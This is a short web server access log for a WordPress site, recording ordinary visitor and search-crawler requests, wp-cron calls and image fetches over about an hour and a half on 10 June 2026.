14.29.109.223 - - [10/Jun/2026:22:32:49 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
36.133.115.36 - - [10/Jun/2026:22:50:22 +0800] "POST /wp-cron.php?doing_wp_cron=1781103022.5861339569091796875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
116.132.219.158 - - [10/Jun/2026:22:50:22 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "YisouSpider"
49.89.118.18 - - [10/Jun/2026:22:50:45 +0800] "GET /news/2420 HTTP/1.1" 200 24066 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36"
111.225.148.205 - - [10/Jun/2026:23:06:17 +0800] "GET /wp-content/uploads/2026/02/1770617948-Article_images_W900%C3%97500px-768x432.webp HTTP/1.1" 200 41870 "http://cqqizhou.com/news/2483" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [10/Jun/2026:23:13:48 +0800] "POST /wp-cron.php?doing_wp_cron=1781104428.5798749923706054687500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
216.244.66.245 - - [10/Jun/2026:23:13:48 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [10/Jun/2026:23:17:13 +0800] "POST /wp-cron.php?doing_wp_cron=1781104633.4107730388641357421875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
168.144.118.236 - - [10/Jun/2026:23:17:13 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/121.0"
216.244.66.245 - - [10/Jun/2026:23:18:50 +0800] "GET /news/portfolio/remaining-rolls HTTP/1.1" 200 81481 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
110.249.202.244 - - [10/Jun/2026:23:39:35 +0800] "GET /wp-content/uploads/2026/02/1770617977-Article_images_W900px-768x576.webp HTTP/1.1" 200 44806 "http://cqqizhou.com/news/2483" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
142.44.233.255 - - [10/Jun/2026:23:39:45 +0800] "GET /news/2543 HTTP/1.1" 200 26108 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
110.167.50.135 - - [10/Jun/2026:23:46:44 +0800] "GET /news/portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF HTTP/1.1" 200 22712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
116.179.32.28 - - [10/Jun/2026:23:55:19 +0800] "GET /industry HTTP/1.1" 200 20164 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [10/Jun/2026:23:55:23 +0800] "POST /wp-cron.php?doing_wp_cron=1781106923.3248670101165771484375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
220.181.108.104 - - [10/Jun/2026:23:55:23 +0800] "GET /news/2159 HTTP/1.1" 200 29349 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"